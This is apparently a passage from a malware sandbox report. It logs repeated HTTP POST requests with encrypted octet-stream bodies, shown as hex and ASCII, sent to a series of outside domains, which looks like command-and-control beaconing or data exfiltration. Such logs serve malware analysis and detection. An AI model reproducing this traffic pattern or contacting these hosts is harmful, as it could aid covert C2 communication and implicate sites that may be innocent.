                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 48 4f 6c 69 63 67 30 58 30 63 72 50 75 62 45 2f 68 45 32 42 47 4d 59 4f 65 59 56 37 69 78 70 2b 6b 62 68 5a 6b 58 34 52 58 55 77 4e 6b 52 48 48 75 68 56 6a 42 34 6d 47 6a 4c 33 2b 48 6b 41 4a 46 33 64 49 66 46 63 4d 6d 46 71 55 63 36 74 7a 69 4c 34 67 4a 37 66 65 55 35 6f 57 62 61 58 63 70 46 68 54 58 36 73 4f 4e 55 46 45 56 42 6d 59 4d 39 48 50 51 77 33 5a 56 59 39 48 43 4a 6e 6c 63 2f 34 62 32 72 42 72 37 72 70 33 51 36 45 32 6d 46 68 66 68 35 6a 74 70 79 56 75 30 69 64 34 38 6e 2f 45 7a 30 6d 6b 73 72 49 4b 71 6d 6f 4b 38 73 74 2f 48 47 53 65 65 37 62 62 75 39 5a 52 68 65 34 78 63 4e 78 7a 65 64 37 47 4d 4a 79 56 57 5a 41 38 43 54 50 75 4e 31 4c 45 4c 72 46 42 75 76 79 2f 33 35 4c 6d 4e 75 38 51 5a 65 52 48 58 7a 4a 42 47 48 36 64 53 56 6f 73 43 62 72 59 4e 70 32 34 71 6e 68 69 6b 72 76 48 48 37 59 30 44 38 68 6e 6b 4b 68 50 6b 47 39 64 74 45 4c 51 4c 78 69 64 4d 51 33 79 56 66 78 47 76 62 57 55 4c 62 45 77 42 6c 34 52 6f 39 77 64 75 36 45 4e 67 52 4a 37 6b 54 39 4b 67 55 33 32 33 55 6f 47 65 4c 52 34 43 6b 52 5a 55 78 43 44 6a 42 54 53 65 75 4b 72 61 6f 72 33 69 5a 65 65 55 64 46 71 59 69 4c 66 6f 34 59 6f 32 4c 2f 42 47 55 54 51 50 72 42 69 66 53 50 67 71 6d 37 47 45 55 78 48 4c 37 56 62 35 61 4f 53 64 48 50 66 4a 64 42 39 4e 32 37 33 7a 41 4b 65 56 67 73 49 63 36 6d 35 72 31 7a 30 58 53 54 38 4f 58 30 6d 54 43 44 30 4b 6e 41 53 58 54 53 6d 51 67 4a 31 36 65 50 48 75 50 38 41 6a 6b 74 55 64 59 37 72 6b 6e 73 49 61 49 71 34 64 6f 4d 2f 45 6a 77 38 6b 51 73 75 50 65 4f 44 69 33 6b 38 6c 45 33 59 56 35 41 34 59 6d 52 6c 6f 4a 32 65 4e 35 51 57 4e 4e 68 37 56 34 64 6f 70 6d 50 56 66 67 77 73 68 4b 67 34 6b 4e 37 50 37 45 30 6f 63 30 6b 57 58 54 4b 41 75 72 68 6e 4b 62 7a 4f 73 44 48 4f 47 78 65 57 39 78 34 54 6b 31 35 44 57 41 61 64 73 75 53 4d 49 72 74 64 49 39 45 72 51 57 38 3d Data Ascii: HOlicg0X0crPubE/hE2BGMYOeYV7ixp+kbhZkX4RXUwNkRHHuhVjB4mGjL3+HkAJF3dIfFcMmFqUc6tziL4gJ7feU5oWbaXcpFhTX6sONUFEVBmYM9HPQw3ZVY9HCJnlc/4b2rBr7rp3Q6E2mFhfh5jtpyVu0id48n/Ez0mksrIKqmoK8st/HGSee7bbu9ZRhe4xcNxzed7GMJyVWZA8CTPuN1LELrFBuvy/35LmNu8QZeRHXzJBGH6dSVosCbrYNp24qnhikrvHH7Y0D8hnkKhPkG9dtELQLxidMQ3yVfxGvbWULbEwBl4Ro9wdu6ENgRJ7kT9KgU323UoGeLR4CkRZUxCDjBTSeuKraor3iZeeUdFqYiLfo4Yo2L/BGUTQPrBifSPgqm7GEUxHL7Vb5aOSdHPfJdB9N273zAKeVgsIc6m5r1z0XST8OX0mTCD0KnASXTSmQgJ16ePHuP8AjktUdY7rknsIaIq4doM/Ejw8kQsuPeODi3k8lE3YV5A4YmRloJ2eN5QWNNh7V4dopmPVfgwshKg4kN7P7E0oc0kWXTKAurhnKbzOsDHOGxeW9x4Tk15DWAadsuSMIrtdI9ErQW8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 66 71 31 69 56 61 67 57 36 63 6f 58 41 79 4e 2f 61 77 6d 30 6e 78 74 38 46 41 79 77 33 6b 46 55 58 47 54 59 69 65 75 66 33 67 59 43 67 54 54 4d 46 56 35 4e 59 76 38 6b 75 64 48 53 48 55 73 35 53 4f 72 7a 4d 53 6d 50 33 34 56 6b 31 61 36 63 48 59 6a 52 67 51 75 73 45 53 2b 71 31 4b 4c 39 39 33 41 39 6e 30 34 37 6e 4d 43 74 45 68 52 31 2b 6e 50 67 4a 57 51 49 61 63 59 66 6a 69 37 75 49 73 6c 50 4d 46 74 33 5a 56 6f 63 6c 37 37 75 49 42 48 2f 52 6a 39 56 37 4a 65 6d 54 4c 65 30 36 53 2f 70 64 57 46 74 36 48 78 42 6d 69 43 42 70 55 61 62 2f 37 36 48 4f 56 53 42 74 36 61 4e 73 34 4c 59 79 48 51 51 58 4c 6e 43 4c 33 69 65 73 42 4a 53 4e 55 78 62 33 4f 41 31 6f 35 69 79 61 48 43 42 2b 54 6c 6d 4c 54 6d 71 52 4a 69 64 63 55 55 2b 4c 65 51 79 45 35 71 59 38 63 53 5a 2b 6b 6f 47 66 71 65 78 79 56 47 57 75 65 77 32 30 69 73 76 66 55 64 66 71 58 33 65 36 73 5a 6b 4b 4c 43 4c 41 79 74 4b 39 39 41 35 48 71 63 61 57 6e 36 61 64 57 62 59 46 55 36 34 36 64 4f 46 6d 63 6c 42 68 47 34 5a 4c 6e 76 4a 49 6f 50 32 36 38 74 69 78 79 33 31 6c 61 4e 6e 65 70 47 4c 31 53 59 53 6d 5a 50 75 4f 52 47 35 42 4b 66 35 57 76 51 55 2f 42 48 61 71 4f 62 44 37 39 57 61 4a 62 64 7a 70 78 73 4b 37 38 4a 32 30 32 56 7a 38 64 73 33 41 4d 35 4b 73 51 58 32 71 42 71 47 52 41 6b 6c 56 78 75 70 43 75 70 74 42 2b 51 79 31 54 4e 79 4e 50 68 75 47 63 42 48 45 57 4d 46 4b 6c 37 4a 36 67 37 71 50 73 78 74 2f 49 79 50 6f 63 6f 45 46 59 44 75 69 70 6c 41 42 74 75 63 6a 2f 64 4f 37 51 49 7a 65 75 45 38 76 4f 57 6c 38 77 47 37 61 34 79 51 39 54 4d 62 64 58 69 44 4b 46 38 6a 66 70 76 4d 4b 4d 58 4e 4e 68 4d 50 6d 70 2b 53 43 56 65 6f 39 56 45 50 44 53 70 76 49 64 41 79 51 46 74 48 6f 44 36 59 7a 39 73 79 4e 6b 58 4c 78 78 2f 74 6e 4c 37 61 2b 66 33 52 6d 68 4d 3d Data Ascii: fq1iVagW6coXAyN/awm0nxt8FAyw3kFUXGTYieuf3gYCgTTMFV5NYv8kudHSHUs5SOrzMSmP34Vk1a6cHYjRgQusES+q1KL993A9n047nMCtEhR1+nPgJWQIacYfji7uIslPMFt3ZVocl77uIBH/Rj9V7JemTLe06S/pdWFt6HxBmiCBpUab/76HOVSBt6aNs4LYyHQQXLnCL3iesBJSNUxb3OA1o5iyaHCB+TlmLTmqRJidcUU+LeQyE5qY8cSZ+koGfqexyVGWuew20isvfUdfqX3e6sZkKLCLAytK99A5HqcaWn6adWbYFU646dOFmclBhG4ZLnvJIoP268tixy31laNnepGL1SYSmZPuORG5BKf5WvQU/BHaqObD79WaJbdzpxsK78J202Vz8ds3AM5KsQX2qBqGRAklVxupCuptB+Qy1TNyNPhuGcBHEWMFKl7J6g7qPsxt/IyPocoEFYDuiplABtucj/dO7QIzeuE8vOWl8wG7a4yQ9TMbdXiDKF8jfpvMKMXNNhMPmp+SCVeo9VEPDSpvIdAyQFtHoD6Yz9syNkXLxx/tnL7a+f3RmhM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 6c 35 72 4a 31 4a 66 70 35 4d 70 59 72 4c 2f 5a 68 76 72 66 6a 75 43 6a 61 43 62 4e 75 54 65 76 75 30 62 48 33 4b 56 69 32 4b 38 64 5a 78 74 56 77 53 63 30 6f 51 77 56 6d 77 55 70 44 51 69 48 57 76 77 6f 30 53 35 6e 61 65 6d 52 71 4e 4e 4a 48 50 70 47 69 71 68 6c 31 6b 67 52 2b 73 33 59 36 6c 6d 30 4d 36 56 54 73 35 36 79 56 42 39 45 43 51 55 43 38 31 51 51 39 70 47 4f 41 53 31 73 72 71 69 58 53 41 53 7a 59 4f 36 53 38 6f 41 76 2f 71 6c 54 32 6d 57 2b 54 43 45 73 4e 76 31 70 2b 68 58 63 73 44 37 70 64 6b 35 52 50 31 72 48 7a 4a 78 42 56 4f 78 5a 4e 39 72 52 32 42 4b 53 72 5a 4a 62 58 2f 41 50 76 62 2f 73 2f 41 71 46 76 43 57 56 63 71 71 44 68 44 4b 71 61 30 57 43 6c 4a 6a 31 46 71 62 69 32 68 68 2f 49 46 55 5a 72 77 6b 31 34 79 47 32 4d 44 6a 67 65 43 4c 56 53 32 32 68 43 67 61 30 4e 42 30 42 65 4e 4a 41 69 4f 56 6c 55 6c 50 74 44 35 4e 4f 35 67 41 4c 50 6e 30 68 38 67 49 4b 6b 78 39 62 62 4e 50 49 43 4d 6f 71 2f 6e 6d 35 47 75 56 37 4d 34 74 4a 5a 35 5a 62 7a 33 39 33 32 70 7a 4f 36 65 65 66 45 30 68 4f 7a 63 45 66 65 52 70 77 52 31 73 74 43 57 47 66 44 56 75 43 68 69 52 52 47 47 59 5a 55 6b 77 67 42 30 6a 6f 33 4c 34 67 4b 4c 38 51 36 4d 77 4a 4a 5a 73 53 76 67 39 69 52 2f 45 71 4b 6b 39 4c 6d 42 4e 4e 58 31 4b 48 73 54 72 37 4f 65 66 7a 33 53 79 75 77 2b 49 77 5a 6f 57 34 61 4a 56 73 70 30 78 54 38 6b 72 4d 30 6a 6f 56 64 42 52 79 71 65 34 44 77 78 61 54 4c 45 67 4c 6a 54 62 4f 2b 37 64 62 63 46 6f 36 77 6c 4f 6e 38 36 4e 72 44 6a 37 5a 38 55 64 53 76 7a 46 6a 2f 4b 67 45 4e 50 76 2f 6b 74 42 49 6e 57 56 65 6f 35 41 2f 30 65 56 53 55 38 36 73 6e 6d 53 43 71 64 65 49 53 73 58 32 7a 75 55 6f 76 71 5a 7a 45 68 76 39 45 6c 56 48 32 35 33 47 4f 71 56 2b 30 72 72 72 37 6e 6a 32 6a 72 4e 6f 63 35 57 63 2b 4e 35 48 4d 6e 41 6a 34 31 68 70 6a 59 4d 4e 54 4c 55 53 59 34 34 3d Data Ascii: l5rJ1Jfp5MpYrL/ZhvrfjuCjaCbNuTevu0bH3KVi2K8dZxtVwSc0oQwVmwUpDQiHWvwo0S5naemRqNNJHPpGiqhl1kgR+s3Y6lm0M6VTs56yVB9ECQUC81QQ9pGOAS1srqiXSASzYO6S8oAv/qlT2mW+TCEsNv1p+hXcsD7pdk5RP1rHzJxBVOxZN9rR2BKSrZJbX/APvb/s/AqFvCWVcqqDhDKqa0WClJj1Fqbi2hh/IFUZrwk14yG2MDjgeCLVS22hCga0NB0BeNJAiOVlUlPtD5NO5gALPn0h8gIKkx9bbNPICMoq/nm5GuV7M4tJZ5Zbz3932pzO6eefE0hOzcEfeRpwR1stCWGfDVuChiRRGGYZUkwgB0jo3L4gKL8Q6MwJJZsSvg9iR/EqKk9LmBNNX1KHsTr7Oefz3Syuw+IwZoW4aJVsp0xT8krM0joVdBRyqe4DwxaTLEgLjTbO+7dbcFo6wlOn86NrDj7Z8UdSvzFj/KgENPv/ktBInWVeo5A/0eVSU86snmSCqdeISsX2zuUovqZzEhv9ElVH253GOqV+0rrr7nj2jrNoc5Wc+N5HMnAj41hpjYMNTLUSY44=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 76 73 66 70 45 4f 4e 39 39 38 70 79 72 6b 7a 4b 61 73 6c 54 63 67 7a 61 6c 79 51 4a 63 6e 2b 78 78 39 45 4b 62 7a 6b 4a 79 62 50 6e 55 78 6e 67 67 72 2f 52 37 63 4b 6b 69 67 65 67 68 6f 59 72 77 75 32 61 33 33 66 71 36 64 55 55 65 4d 53 59 32 67 51 61 6d 42 73 65 46 49 76 42 62 7a 4b 39 4d 4b 78 49 70 2f 54 68 6e 63 6a 59 75 79 76 68 4c 2f 36 4c 6f 68 53 2b 58 33 76 6d 41 56 61 6f 6d 65 34 58 32 49 61 6b 6a 33 61 6b 56 48 48 6c 51 51 61 6c 6b 72 71 37 46 2b 6c 45 73 39 6e 46 72 30 76 62 5a 53 35 41 65 43 46 51 54 57 47 73 76 43 35 6a 2f 51 6b 2f 62 61 6a 2b 4e 74 41 69 69 78 43 39 73 70 6c 49 43 46 70 33 78 65 5a 55 44 6a 49 75 48 6f 63 35 77 57 50 62 41 71 6a 44 39 51 2f 6a 4d 48 43 49 4a 42 54 56 49 51 53 79 57 4b 79 65 63 53 48 51 31 55 70 44 6e 55 43 5a 63 67 4e 63 71 69 78 63 44 58 32 61 53 4f 65 70 4a 6f 33 44 73 72 2f 68 4c 78 61 79 36 6c 49 78 31 34 33 64 54 4a 47 7a 68 32 74 2f 50 49 6a 75 6d 78 31 32 4f 43 71 4f 46 51 64 74 38 76 5a 4d 61 65 37 2f 6f 6e 33 6b 41 6e 67 47 67 4d 70 4c 43 37 35 79 33 6f 64 73 51 54 31 57 30 68 6e 6f 4b 33 75 78 41 75 4a 32 59 58 45 73 2f 4c 47 4d 55 39 62 46 58 6a 67 61 4a 54 66 35 50 4a 6a 53 46 37 70 46 6f 55 75 4d 4d 6a 6f 4e 2f 55 76 4a 71 7a 69 34 64 4a 66 46 79 6a 6e 77 49 44 49 64 6a 5a 6f 43 7a 37 54 66 72 75 38 42 79 76 2b 4d 79 4a 30 50 73 4e 35 4b 50 49 69 6d 48 76 6b 69 52 6f 73 2f 79 47 6a 30 53 73 59 44 50 6e 4e 58 76 32 72 4f 4e 75 6a 78 79 7a 4f 74 6a 61 4b 71 73 4a 4b 39 4c 4c 4f 2f 6e 67 4d 54 47 68 6e 4d 49 47 5a 6e 66 68 6d 51 35 62 6e 59 54 62 7a 36 62 7a 42 53 47 5a 50 65 4b 36 73 6d 4d 2b 79 47 79 74 61 6b 4d 6d 62 42 50 41 50 5a 4a 75 53 56 63 38 67 7a Data Ascii: vsfpEON998pyrkzKaslTcgzalyQJcn+xx9EKbzkJybPnUxnggr/R7cKkigeghoYrwu2a33fq6dUUeMSY2gQamBseFIvBbzK9MKxIp/ThncjYuyvhL/6LohS+X3vmAVaome4X2Iakj3akVHHlQQalkrq7F+lEs9nFr0vbZS5AeCFQTWGsvC5j/Qk/baj+NtAiixC9splICFp3xeZUDjIuHoc5wWPbAqjD9Q/jMHCIJBTVIQSyWKyecSHQ1UpDnUCZcgNcqixcDX2aSOepJo3Dsr/hLxay6lIx143dTJGzh2t/PIjumx12OCqOFQdt8vZMae7/on3kAngGgMpLC75y3odsQT1W0hnoK3uxAuJ2YXEs/LGMU9bFXjgaJTf5PJjSF7pFoUuMMjoN/UvJqzi4dJfFyjnwIDIdjZoCz7Tfru8Byv+MyJ0PsN5KPIimHvkiRos/yGj0SsYDPnNXv2rONujxyzOtjaKqsJK9LLO/ngMTGhnMIGZnfhmQ5bnYTbz6bzBSGZPeK6smM+yGytakMmbBPAPZJuSVc8gz
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 71 64 45 4e 30 59 33 4b 35 4d 6f 49 58 2f 75 34 42 47 71 47 65 6b 61 4f 2f 47 72 37 4e 42 58 2b 45 65 7a 36 75 6f 78 58 72 6c 30 6c 57 50 34 62 52 61 34 48 79 2f 38 51 48 45 5a 2b 79 6b 44 61 6b 54 36 56 41 39 76 33 4d 45 6d 58 6c 34 36 4e 45 79 6d 50 56 71 53 39 45 54 33 6f 6f 2f 49 65 54 72 54 57 70 71 65 4e 50 30 4e 35 33 59 37 34 72 2f 53 39 46 42 2f 6c 64 71 4f 68 77 67 6a 36 36 70 55 62 6a 38 2b 43 75 71 37 47 6a 4e 53 70 45 46 4f 31 2f 4a 73 65 75 65 42 73 44 62 4b 48 33 4a 74 77 30 37 48 33 32 41 31 6b 43 5a 38 68 34 6b 6e 44 4a 6e 43 51 36 4b 4f 30 53 44 33 75 6b 78 42 2b 76 2b 31 63 68 2f 77 54 77 5a 4c 64 4e 76 6f 37 47 31 68 70 59 2f 63 66 77 39 38 7a 52 43 33 51 71 56 6e 45 47 72 32 6f 62 39 6f 2b 71 47 6b 56 4c 79 45 6a 77 6c 4c 38 32 71 37 37 2f 6f 39 64 61 67 58 52 2f 33 54 59 4b 55 59 39 58 42 73 6a 46 6f 7a 78 70 6d 54 45 54 51 72 6c 6f 2b 4e 59 52 30 52 2f 70 45 35 62 6c 33 39 64 50 63 69 6e 4c 7a 66 57 4c 47 47 38 58 61 79 72 33 45 61 37 51 6a 2b 78 61 66 68 58 6f 4b 46 77 70 4d 58 65 4e 65 70 65 33 6d 69 2b 44 69 74 44 5a 58 71 53 34 6b 76 76 57 62 50 76 4e 67 4b 58 4c 76 6c 7a 2b 47 37 64 37 47 67 5a 36 42 30 63 30 54 6d 77 30 2f 53 2f 6d 6f 71 43 6a 61 62 6d 69 5a 59 34 33 5a 6e 65 34 65 49 53 75 4b 76 4d 61 35 42 35 63 69 65 79 51 58 34 53 53 6f 36 67 2b 50 4f 6b 44 6f 66 4e 30 64 33 44 51 2f 69 7a 71 4d 32 46 4b 56 4a 52 4c 6f 45 5a 76 79 44 71 56 73 70 41 38 38 6c 61 63 39 79 52 73 46 35 6f 42 52 33 51 77 63 6e 7a 44 6e 32 49 4e 66 33 72 34 73 61 62 46 6b 47 5a 31 53 72 41 74 4e 73 34 39 63 4e 55 56 64 32 2b 36 47 4c 4c 35 66 66 78 70 70 74 73 65 61 6d 38 31 32 5a 75 4f 63 6a 72 51 79 76 35 36 7a 4b 63 66 70 6a 62 47 32 74 31 4e 63 44 4a 61 46 68 70 74 78 59 3d Data Ascii: qdEN0Y3K5MoIX/u4BGqGekaO/Gr7NBX+Eez6uoxXrl0lWP4bRa4Hy/8QHEZ+ykDakT6VA9v3MEmXl46NEymPVqS9ET3oo/IeTrTWpqeNP0N53Y74r/S9FB/ldqOhwgj66pUbj8+Cuq7GjNSpEFO1/JseueBsDbKH3Jtw07H32A1kCZ8h4knDJnCQ6KO0SD3ukxB+v+1ch/wTwZLdNvo7G1hpY/cfw98zRC3QqVnEGr2ob9o+qGkVLyEjwlL82q77/o9dagXR/3TYKUY9XBsjFozxpmTETQrlo+NYR0R/pE5bl39dPcinLzfWLGG8Xayr3Ea7Qj+xafhXoKFwpMXeNepe3mi+DitDZXqS4kvvWbPvNgKXLvlz+G7d7GgZ6B0c0Tmw0/S/moqCjabmiZY43Zne4eISuKvMa5B5cieyQX4SSo6g+POkDofN0d3DQ/izqM2FKVJRLoEZvyDqVspA88lac9yRsF5oBR3QwcnzDn2INf3r4sabFkGZ1SrAtNs49cNUVd2+6GLL5ffxpptseam812ZuOcjrQyv56zKcfpjbG2t1NcDJaFhptxY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 53 54 70 6d 4b 4e 73 78 45 63 74 45 68 79 68 35 38 72 32 4f 52 4d 54 45 66 42 68 68 34 54 53 62 50 34 6b 32 64 35 49 35 45 7a 4b 61 78 34 35 73 49 42 43 58 72 30 44 64 53 44 61 35 72 72 77 6f 79 46 5a 2b 4b 6a 63 2b 5a 45 7a 59 65 47 37 4e 67 32 44 32 65 61 7a 68 39 65 44 6c 4c 66 59 56 57 73 79 75 6f 42 72 4e 45 39 7a 62 63 53 53 39 6c 42 48 42 6d 62 54 58 32 42 69 7a 7a 5a 55 32 32 4e 47 2f 56 6d 75 74 61 73 50 73 75 41 48 30 47 79 55 59 6b 34 6a 39 52 48 35 37 41 55 41 47 71 61 34 59 30 44 45 57 51 4f 4a 4c 52 43 43 53 74 7a 50 4a 61 56 55 41 6c 4e 38 67 55 47 43 6f 77 2b 5a 2f 79 44 33 43 36 4c 47 6c 6b 6d 32 71 74 30 38 73 75 41 41 46 6d 46 38 46 32 65 38 67 36 63 61 4c 32 69 65 45 46 35 39 77 65 6d 4b 39 38 75 5a 70 34 58 35 64 34 31 64 37 2b 4b 4c 51 4d 78 56 35 71 45 51 4d 38 66 6c 65 6c 4f 66 58 63 6b 67 63 58 51 48 4c 5a 4b 33 6d 2b 47 68 44 4e 6b 66 62 35 35 2f 55 55 4c 72 77 64 72 54 62 4a 58 39 6b 55 32 6c 57 32 46 36 4e 31 67 31 6e 36 46 30 34 50 6c 4c 49 71 4f 75 61 4b 7a 78 52 35 33 56 49 70 41 78 75 62 52 63 54 37 75 4b 49 4d 50 77 38 64 6e 47 5a 64 4f 45 49 30 76 53 43 74 2b 66 2b 78 79 2b 59 2f 7a 31 36 74 45 69 2f 75 70 45 65 2f 78 69 52 39 68 45 62 62 50 75 37 47 49 58 6f 77 76 6b 63 35 6d 74 6d 59 36 4c 4f 61 41 6e 78 52 64 58 79 68 30 4b 68 2f 76 39 67 71 50 51 4f 6d 33 4b 54 51 78 5a 6c 54 53 49 64 4d 35 35 34 42 38 67 64 69 74 6b 61 43 4d 69 65 53 44 67 4f 7a 57 77 58 61 41 63 4d 4c 4f 4e 68 7a 57 2b 64 78 33 5a 64 47 72 70 67 42 78 77 52 61 35 72 48 49 39 72 57 65 6e 71 49 38 4a 33 79 59 4b 73 65 65 56 37 77 4c 4a 66 63 61 39 4a 6f 54 4a 63 51 54 33 46 67 6f 48 61 47 2b 71 30 73 6b 67 31 55 6f 6d 4f 6c 54 76 31 34 55 47 76 51 6c 56 56 57 78 63 2b 6b 43 32 64 56 6a 38 39 44 30 77 3d 3d Data Ascii: STpmKNsxEctEhyh58r2ORMTEfBhh4TSbP4k2d5I5EzKax45sIBCXr0DdSDa5rrwoyFZ+Kjc+ZEzYeG7Ng2D2eazh9eDlLfYVWsyuoBrNE9zbcSS9lBHBmbTX2BizzZU22NG/VmutasPsuAH0GyUYk4j9RH57AUAGqa4Y0DEWQOJLRCCStzPJaVUAlN8gUGCow+Z/yD3C6LGlkm2qt08suAAFmF8F2e8g6caL2ieEF59wemK98uZp4X5d41d7+KLQMxV5qEQM8flelOfXckgcXQHLZK3m+GhDNkfb55/UULrwdrTbJX9kU2lW2F6N1g1n6F04PlLIqOuaKzxR53VIpAxubRcT7uKIMPw8dnGZdOEI0vSCt+f+xy+Y/z16tEi/upEe/xiR9hEbbPu7GIXowvkc5mtmY6LOaAnxRdXyh0Kh/v9gqPQOm3KTQxZlTSIdM554B8gditkaCMieSDgOzWwXaAcMLONhzW+dx3ZdGrpgBxwRa5rHI9rWenqI8J3yYKseeV7wLJfca9JoTJcQT3FgoHaG+q0skg1UomOlTv14UGvQlVVWxc+kC2dVj89D0w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 53 39 35 2f 4b 36 46 4c 45 63 74 58 4a 7a 39 7a 41 50 41 71 30 33 72 77 49 49 2b 66 4c 62 74 50 5a 64 51 63 73 34 6f 77 76 57 68 79 2b 75 53 41 55 73 77 7a 6d 4c 6c 79 47 48 33 30 50 68 55 34 4c 37 72 4b 2b 32 6e 50 78 30 61 4b 33 7a 32 61 52 36 45 35 43 74 52 61 49 52 6e 6e 61 51 46 38 78 56 53 54 45 32 6a 74 35 4c 69 51 78 4b 44 37 5a 6a 51 32 6f 43 56 71 34 79 35 56 2f 74 4c 69 72 42 4f 55 58 54 47 36 6f 4c 46 2f 67 39 31 51 2f 59 30 64 37 61 46 50 52 77 44 36 34 56 7a 64 45 7a 4d 74 63 53 2f 46 49 66 6b 52 55 4b 50 45 46 78 6c 79 6e 4f 57 68 6a 57 70 66 32 45 78 54 64 53 49 6d 58 4b 44 67 58 53 38 76 44 73 78 6b 31 66 38 39 69 6d 42 49 55 6e 55 71 31 35 61 6a 53 71 76 79 77 48 43 34 67 38 75 5a 46 2b 72 61 35 32 77 42 41 64 4a 2b 35 7a 30 72 50 50 30 65 4b 79 46 74 42 69 49 48 5a 72 50 4c 70 2b 44 5a 79 31 48 2b 4b 45 72 43 54 43 64 4b 44 73 45 67 63 76 54 32 4e 41 36 72 70 54 39 39 33 36 70 53 50 73 6f 63 58 70 68 4a 6a 6b 54 41 55 52 48 73 66 6f 76 6b 72 4a 37 46 37 76 46 52 70 53 6f 6b 7a 65 4d 46 31 77 63 75 41 36 73 47 67 77 72 45 4a 65 67 52 4e 56 4f 38 32 47 6a 48 78 33 51 59 59 55 4e 5a 48 66 66 72 37 30 4e 5a 30 36 4b 2f 76 43 37 36 38 4f 6c 34 79 6b 61 63 77 31 75 68 76 46 6b 48 73 2f 34 32 62 50 78 70 2f 63 73 6a 55 4a 35 46 4c 4f 73 55 44 74 5a 2b 36 4f 59 2b 78 6d 49 4f 41 6a 71 31 58 6c 50 47 78 37 6d 4d 54 63 64 59 31 33 72 34 69 47 64 45 38 54 61 4a 53 4e 2f 53 55 57 54 59 37 68 59 59 4b 71 6d 43 6f 48 52 4b 73 4a 59 70 45 77 4c 47 78 7a 38 54 6a 49 42 50 50 35 4d 62 50 67 6b 6b 63 55 75 44 57 2f 74 36 69 36 6c 4d 44 31 6b 77 77 55 2b 6a 2b 6c 46 6d 51 6d 77 62 Data Ascii: S95/K6FLEctXJz9zAPAq03rwII+fLbtPZdQcs4owvWhy+uSAUswzmLlyGH30PhU4L7rK+2nPx0aK3z2aR6E5CtRaIRnnaQF8xVSTE2jt5LiQxKD7ZjQ2oCVq4y5V/tLirBOUXTG6oLF/g91Q/Y0d7aFPRwD64VzdEzMtcS/FIfkRUKPEFxlynOWhjWpf2ExTdSImXKDgXS8vDsxk1f89imBIUnUq15ajSqvywHC4g8uZF+ra52wBAdJ+5z0rPP0eKyFtBiIHZrPLp+DZy1H+KErCTCdKDsEgcvT2NA6rpT9936pSPsocXphJjkTAURHsfovkrJ7F7vFRpSokzeMF1wcuA6sGgwrEJegRNVO82GjHx3QYYUNZHffr70NZ06K/vC768Ol4ykacw1uhvFkHs/42bPxp/csjUJ5FLOsUDtZ+6OY+xmIOAjq1XlPGx7mMTcdY13r4iGdE8TaJSN/SUWTY7hYYKqmCoHRKsJYpEwLGxz8TjIBPP5MbPgkkcUuDW/t6i6lMD1kwwU+j+lFmQmwb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 2b 73 4b 51 4c 63 31 63 45 63 75 53 46 43 42 78 52 46 64 50 68 34 59 61 2b 45 6f 37 6c 50 78 4a 55 58 70 77 62 42 6f 59 55 53 64 70 61 37 4a 6f 72 45 6a 58 7a 4b 74 50 2b 61 38 31 35 31 35 52 62 34 74 39 6b 41 52 39 71 6e 55 65 72 76 69 57 6e 71 66 31 41 2b 57 4d 43 34 41 74 62 62 69 70 46 72 52 46 77 61 70 38 70 6f 4b 6a 56 56 77 61 31 2b 63 52 68 75 47 53 6d 6c 6f 4a 37 73 65 41 5a 2b 74 45 64 36 70 30 32 30 4b 6f 62 51 44 58 52 59 62 72 53 4a 39 4d 65 2b 64 42 56 30 38 66 2b 46 6f 35 48 6f 6e 50 71 55 57 6c 6a 31 57 6b 34 45 6d 51 65 55 59 4a 55 72 62 44 70 41 4d 6d 4d 2f 4a 6e 7a 34 78 76 68 66 72 55 78 70 7a 39 62 55 32 6d 72 2b 77 65 69 5a 42 78 4b 66 39 6b 79 4a 37 6a 52 43 79 4d 4d 43 36 74 6e 42 6c 4e 75 35 57 6c 37 4d 35 42 5a 78 41 61 77 41 62 45 6a 44 7a 67 55 49 33 73 67 6a 72 4a 6c 6c 43 79 37 63 64 4a 63 6a 56 49 32 4d 58 6a 74 46 59 2f 31 64 35 39 38 56 4e 44 4c 35 47 42 70 48 67 34 53 35 50 4b 2b 4d 76 6b 4b 62 65 63 71 4f 53 56 57 70 6e 32 37 4b 31 35 55 6f 49 54 78 75 72 58 79 37 2b 53 41 74 2b 52 4f 51 53 68 35 51 78 67 49 75 5a 6c 4d 33 44 57 56 58 50 6e 75 2f 55 36 61 79 45 50 4b 65 51 63 52 64 67 2f 34 53 4e 6b 63 62 53 4f 34 51 7a 71 30 48 30 38 2f 47 47 56 34 57 33 54 72 36 67 49 4c 56 33 66 55 55 76 63 35 4b 52 43 68 65 44 76 51 